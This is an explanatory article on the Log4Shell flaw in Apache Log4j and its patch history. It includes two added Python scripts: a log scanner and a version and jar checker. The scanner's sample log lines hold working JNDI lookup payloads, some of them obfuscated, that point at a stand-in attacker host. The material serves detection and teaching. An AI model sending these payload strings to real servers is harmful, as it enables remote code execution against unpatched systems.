
Log4Shell - The zero-day vulnerability that scares the internet

13 January 2022

On December 10, 2021, the disclosure of a serious vulnerability in the Apache Log4j library, dubbed Log4Shell (CVE-2021-44228), put a huge number of Java applications and services at risk.

The risk is so high that the flaw was assigned the maximum score, 10 out of 10, on the CVSS scale used to rate such vulnerabilities, and it affects a large number of organizations, both public and private.

Let's try to understand how this well-known Apache open source library works and why the bug risked doing so much damage.

What is Log4j?

Log4j is a library, written in Java, that lets developers produce logs, that is, a record of the operations carried out by whoever accesses and uses the software. In other words: "its purpose is simply to keep track of everything that happens on the servers, noting every operation performed in a text file"(1).

Log4j therefore lets application developers store a large amount of data that is useful for monitoring the behaviour of the software, both during development and once it is running in production. This makes it much easier for engineers to spot errors, malfunctions and bugs.

It is the best-known and most widely used open source logging library, adopted by a huge number of companies around the world. It is found, for example, in products and services from Microsoft, Twitter, Amazon, Minecraft, Steam and iCloud, to name just a few.

And inside it, it turned out, was a zero-day vulnerability that came to be known as Log4Shell.

Log4Shell

Immediately described as the "single largest and most critical vulnerability of the last decade"(2), Log4Shell is a zero-day bug, that is, a vulnerability that was unknown to the developers who maintain the library, and for which no fix existed, when exploitation began.

The bug lets an attacker who exploits it take control, remotely and without authentication, of servers running a vulnerable version of the library: it is enough for the server to log a string the attacker controls. In practice this translates into illegal activity such as cryptocurrency mining, the installation of malware that steals (and resells) login credentials, ransomware and espionage.

The threat to cyber security is very serious, for several reasons. First, Log4Shell is very easy to exploit and, as already mentioned, it touches a huge amount of software, devices and companies. Suffice it to say that in the 12 hours after the discovery was announced, over 40 thousand attacks were recorded, involving more than 90 countries around the world.

Furthermore, the seriousness of the situation also stems from the fact that, because of the nature of the bug, it is very difficult to work out where and, above all, from whom these attacks originate. Although most of the threats pass through servers located in Russia, this does not necessarily mean the Russian government is involved:

"The Log4Shell attack, in fact, consists of two parts: the first is to send a specially written web request to a vulnerable server or device to exploit the vulnerability; the second is to make malware available somewhere, which the target hit by the first action will then download"(3). Not to mention that many attacks use a VPN connection to hide their origin.
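The first of those two steps works because the crafted request carries a string that the vulnerable server logs and then resolves as a JNDI lookup, so defenders hunting for it look for that lookup in their web access logs. The detector below is an added example, not code from the article or from the Log4j project: it shows how attackers hide the `${jndi:...}` string behind nested lookups and URL encoding, and how to normalise a line before matching so that those disguises do not defeat a simple search. The log lines, the attacker host attacker.example and the request paths are constructed for illustration.

```python
"""Spot Log4Shell (CVE-2021-44228) lookup strings in web access logs, including
the obfuscated forms attackers use to slip past naive '${jndi:' matching.

Added example, not code from the original article. The log lines at the bottom
are constructed; attacker.example and the paths are hypothetical.
"""
import re
import urllib.parse

# A single Log4j lookup with nothing nested inside it: ${...}
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup pointing at one of the protocol handlers seen in attacks
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldap|rmi|dns|iiop|corba|nds|http)s?://", re.I)


def _resolve_lookup(body):
    """Approximate Log4j's StrSubstitutor for one innermost lookup.

    Mirrors the tricks used to hide the word 'jndi':
      ${lower:J} -> 'j'   ${upper:j} -> 'J'   ${::-j} -> 'j'   ${env:NOPE:-j} -> 'j'
    Any other lookup (sys, env, date, ...) is assumed not to resolve on this host
    and collapses to its ':-' default value, or to nothing.
    """
    key, _, default = body.partition(":-")
    prefix, has_colon, value = key.partition(":")
    if has_colon and prefix.strip().lower() == "lower":
        return value.lower()
    if has_colon and prefix.strip().lower() == "upper":
        return value.upper()
    return default


def normalize(text, max_rounds=200):
    """URL-decode, then resolve nested non-JNDI lookups from the inside out.

    The JNDI lookup itself is deliberately left in place so it can be matched.
    max_rounds bounds the work done on pathological input.
    """
    for _ in range(3):                      # peel double/triple URL encoding
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        target = None
        for m in INNER_LOOKUP.finditer(text):
            if not m.group(1).lstrip().lower().startswith("jndi"):
                target = m
                break
        if target is None:
            break
        text = text[:target.start()] + _resolve_lookup(target.group(1)) + text[target.end():]
    return text


def scan_log(lines):
    """Return (client_ip, resolved_lookup) for every access-log line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if not m:
            continue
        end = norm.find("}", m.end())
        lookup = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append((line.split(" ", 1)[0], lookup))   # combined log format: client IP comes first
    return hits


# Constructed sample in Apache/Nginx combined log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.64.1"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/c}"',
    '10.0.0.6 - - [10/Dec/2021:14:02:15 +0000] "GET /docs/${version} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, lookup in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{lookup}")
```

The normalisation step is what matters: the second and third attacker lines contain no literal `${jndi:` at all, yet resolve to the same lookup as the first. Note also that the harmless `${version}` in the last line is not flagged; a rule that alerts on any `${` would catch it, which is a reasonable choice during an incident but noisy afterwards. Access logs only show the web layer; the same string can arrive through any field an application logs, so the check belongs wherever untrusted input is recorded.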

As soon as the flaw became public knowledge, although in reality it was already being exploited, a huge wave of cyber attacks began, some of them state-sponsored, i.e. linked to the governments of countries such as China, Iran, North Korea and Turkey.

Run for cover

Apache, of course, did not stand by and watch. The Apache Software Foundation, which maintains the library, quickly released two patches. Neither was enough: the first (2.15.0) turned out to be incomplete, leaving a related flaw (CVE-2021-45046) that still allowed the lookup to be abused in some configurations, and the second (2.16.0) was found to be open to a denial-of-service attack through uncontrolled recursion in lookups (CVE-2021-45105).

Only the third patch, version 2.17.0 of Log4j, appears to be immune to Log4Shell. So far, in fact, none of the organizations that have deployed this version of the library have reported security problems.

Reaching this solution, however, took more than two weeks. Precious time, which cost over 4 million cyber attacks, with 43% of Italian companies affected, and damage that is and will remain difficult to quantify.

The announcement of a definitive fix for the flaw, however, does not mean we can let our guard down. The Italian cybersecurity agency warns that the latest release of Log4j (2.17.1) addresses a further vulnerability, CVE-2021-44832, which could allow code execution by someone who has already penetrated the system, since it requires the attacker to be able to modify the logging configuration. While this is considered a lesser threat, upgrading remains of paramount importance.
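For anyone responding to this patch series, the practical question is which log4j-core version each application ships and which of the four CVEs that version is still exposed to. The assessment script below is an added example, not the article's or Apache's code. The fix versions come from the Apache Log4j security advisories, including the separate Java 7 (2.12.x) and Java 6 (2.3.x) backport lines; the jar it inspects is a constructed stand-in containing only the two entries the check reads; and it does not model the advisories' lower bounds, so every older 2.x build is treated as affected.

```python
"""Assess a log4j-core version against the Log4Shell-era CVEs and inspect a jar.

Added example, not code from the article. Fix versions follow the Apache Log4j
security advisories; the sample jar built below is a constructed stand-in.
"""
import io
import re
import zipfile

# Fixed-in version for each CVE, per release line. The Java 7 (2.12.x) and
# Java 6 (2.3.x) backport lines received their own fixes.
FIXED_IN = {
    "CVE-2021-44228": {"main": "2.15.0", "2.12": "2.12.2", "2.3": "2.3.1"},
    "CVE-2021-45046": {"main": "2.16.0", "2.12": "2.12.2", "2.3": "2.3.1"},
    "CVE-2021-45105": {"main": "2.17.0", "2.12": "2.12.3", "2.3": "2.3.1"},
    "CVE-2021-44832": {"main": "2.17.1", "2.12": "2.12.4", "2.3": "2.3.2"},
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.I)


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a sortable tuple; pre-releases sort below the release."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, tag, tagnum = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if tag else 1, int(tagnum or 0))


def release_line(version):
    """Pick the advisory column that applies to this parsed version."""
    major, minor = version[0], version[1]
    if major != 2:
        return None            # Log4j 1.x is a different code base, not covered here
    if minor == 12:
        return "2.12"
    if minor == 3:
        return "2.3"
    return "main"


def exposed_cves(version_text):
    """Return the CVE IDs this log4j-core version is still exposed to."""
    v = parse_version(version_text)
    line = release_line(v)
    if line is None:
        return []
    # Every 2.x build below the fix version is treated as affected; the
    # advisories' lower bounds (2.0-beta9 / 2.0-alpha1) are not modelled.
    return [cve for cve, fixes in FIXED_IN.items() if v < parse_version(fixes[line])]


def minimum_fixed_version(version_text):
    """Lowest version on the same release line that closes all four CVEs."""
    line = release_line(parse_version(version_text))
    return None if line is None else FIXED_IN["CVE-2021-44832"][line]


JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def inspect_jar(jar):
    """Read the bundled version and check whether JndiLookup.class is still present.

    `jar` is a path or a file-like object. Returns (version or None, jndi_class_present).
    The widely used 'delete JndiLookup.class' mitigation leaves the version string
    unchanged, so both facts are needed to judge exposure to CVE-2021-44228.
    """
    with zipfile.ZipFile(jar) as z:
        names = set(z.namelist())
        version = None
        if POM_PROPS in names:
            for raw in z.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if raw.startswith("version="):
                    version = raw.split("=", 1)[1].strip()
        return version, JNDI_CLASS in names


def build_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar holding only the two entries we inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder bytes, not real bytecode
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for v in ["2.0-beta9", "2.14.1", "2.15.0", "2.16.0", "2.17.0", "2.17.1", "2.12.2", "2.3.1"]:
        print(f"{v:10} exposed to {exposed_cves(v) or 'nothing'}; upgrade to at least {minimum_fixed_version(v)}")
    print("sample jar:", inspect_jar(build_sample_jar("2.14.1", include_jndi=False)))
```

Two points a practitioner will want from this: a version string alone is not the whole story, because a 2.14.1 jar with JndiLookup.class removed is not exploitable through CVE-2021-44228 while a pristine one is; and applications that shade or repackage log4j-core often drop pom.properties, in which case the class listing is the only evidence left and the version must be recovered another way.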
